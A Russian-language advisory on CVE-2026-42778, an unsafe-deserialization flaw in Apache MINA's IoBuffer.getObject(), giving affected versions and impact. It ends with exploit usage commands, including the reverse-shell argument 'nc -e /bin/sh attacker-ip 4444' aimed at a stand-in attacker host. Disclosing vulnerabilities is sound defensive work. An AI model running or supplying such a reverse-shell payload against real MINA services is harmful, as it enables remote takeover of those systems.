
CVE-2026-42778 EUVD-2026-26492 Десериализация недоверенных данных (CWE-502)
Неполное исправление в методе AbstractIoBuffer.getObject() в Apache MINA. Проверка разрешённого списка имён классов, которая ограничивает, какие классы могут быть десериализованы, применяется слишком поздно — после того, как статические инициализаторы в читаемых классах могли уже выполниться. Это происходит потому, что исходное исправление для CVE-2024-52046 не было должным образом применено к веткам 2.1.X и 2.2.X. Затронутые версии: - Apache MINA 2.1.0 – 2.1.11 - Apache MINA 2.2.0 – 2.2.6
ID CVE: CVE-2026-42778
Опубликовано: 05.01.2026
Воздействие: Критическое
Доступность эксплойта: Не публичный, только приватный.
CVSS: 9.8
Патч доступен: (Официального патча пока нет)
Злоумышленник может создать вредоносные сериализованные объекты, которые при обработке методом IoBuffer.getObject() выполняют произвольный код через статические инициализаторы до того, как произойдёт проверка разрешённого списка имён классов. Поскольку это уязвимость, доступная по сети и не требующая привилегий или взаимодействия с пользователем, возможно удалённое выполнение кода в любом приложении, использующем Apache MINA и вызывающем метод IoBuffer.getObject(). Уязвимость позволяет полностью скомпрометировать конфиденциальность, целостность и доступность затронутых систем.
# Компиляция и генерация
javac ExploitGenerator.java
java ExploitGenerator "nc -e /bin/sh attacker-ip 4444"
# Отправка по сети в службу на основе MINA с использованием ObjectSerializationCodecFactory
# или в любую конечную точку, которая вызывает IoBuffer.getObject()